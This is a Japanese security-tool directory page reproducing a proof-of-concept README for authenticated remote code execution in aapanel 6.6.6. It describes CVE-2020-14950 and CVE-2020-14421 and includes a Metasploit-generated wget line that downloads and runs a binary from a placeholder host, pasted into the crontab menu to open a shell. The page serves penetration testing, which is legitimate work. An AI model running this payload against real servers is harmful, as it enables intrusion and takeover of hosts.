Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
aapanel — aapanel 6.6.6 - (認証済み)リモートコード実行 | Kitploit
ツール/GitHubGitHub/jenaye/aapanel
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (認証済み)リモートコード実行

リポジトリを見る
2736年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • 説明: リモートの認証済みユーザーが、ソフトウェアストアの設定メニューを介して任意のコマンドを実行できます。
  • 影響を受けるバージョン: すべて <= 6.6.6

情報

このPoCを作成するために、docker-composeを使用してソフトウェアをインストールしました。

  • 脆弱性タイプ: リモートコマンド実行 (認証済みRCE)

POC

ソフトウェアストアに移動し、設定フィールドの任意の行をクリックして、"start/stop/restart"をクリックしたときのリクエストをインターセプトし、リクエストを変更/編集して任意のコマンドを実行します。curlを使用した例は次のとおりです:

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • 説明: 攻撃者がリモートで任意のコマンドを実行できるようにします。
  • 影響を受けるバージョン: すべて <= 6.6.6

情報

このPoCを作成するために、クリーンなUbuntu 20.04をインストールし、wgetとsudoをインストールして、次のスクリプトを実行しました: wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • 脆弱性タイプ: リモートコマンド実行 (RCE 認証済み)

POC

まず、web_deliveryオプションを設定します。これにより、ペイロードとリスナーが作成されます。

web_delivery

次に、それを実行します。

run

これにより、次のペイロードが生成されます:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

次に、これをaapanelのcrontabメニューのscript contentにコピー&ペーストします。

cron

あとはcrontabを実行して、セッションを待つだけです。

command

高速エクスプロイト

msfconsole -r aapanel.rcを実行し、ペイロードをscript contentセクションにコピー&ペーストして、セッションをお楽しみください。

ツールをダウンロード